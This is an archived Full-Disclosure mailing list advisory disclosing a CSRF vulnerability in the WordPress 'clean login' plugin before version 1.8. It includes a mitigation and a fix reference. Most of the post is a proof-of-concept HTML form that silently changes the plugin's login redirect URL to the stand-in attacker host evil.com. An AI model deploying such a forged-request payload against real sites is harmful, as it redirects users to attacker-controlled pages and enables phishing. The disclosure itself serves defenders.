| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 5 May 2017 12:53:28 +0000 From: Zeng Wester <evilzyzeng@...look.com> To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org> Subject: [FD] CSRF in wordpress plugin clean login allows remote attacker change wordpress login redirect url or logout redirect url to evil address =============== Software Description =============== Software:clean login version:<1.8 description:Responsive Frontend Login and Registration plugin. ======== Details ======== CSRF in wordpress plugin clean login allows remote attacker change wordpress login redirect url or logout redirect url to evil address. ======== POC: ======== <form method="POST" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wpcsw_settings"> <input type="text" name= "adminbar" value=“on"> <input type="text" name="emailnotificationcontent" value=""> <input type="text" name="termsconditionsMSG" value=""> <input type="text" name="termsconditionsURL" value=""> <input type="text" name="urlredirect" value=“http://127.0.0.1/wordpress”> <input type=“text” name="loginredirect” value=“on”> <input type=“text” name="loginredirect_url” value="http://evil.com”> <input type=“text” name="logoutredirect_url” value="http://127.0.0.1/wordpress”> <input type=“text” name="cl_hidden_field” value="hidden_field_to_update_others”> <input type=“text” name="Submit” value="Save Changes”> <input type="submit”> </form> ========= Mitigations ================ Disable the plugin until a new version is released that fixes this bug. ========= Fixed ========= https://wordpress.org/plugins/clean-login/#developers(1.8 version update) _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists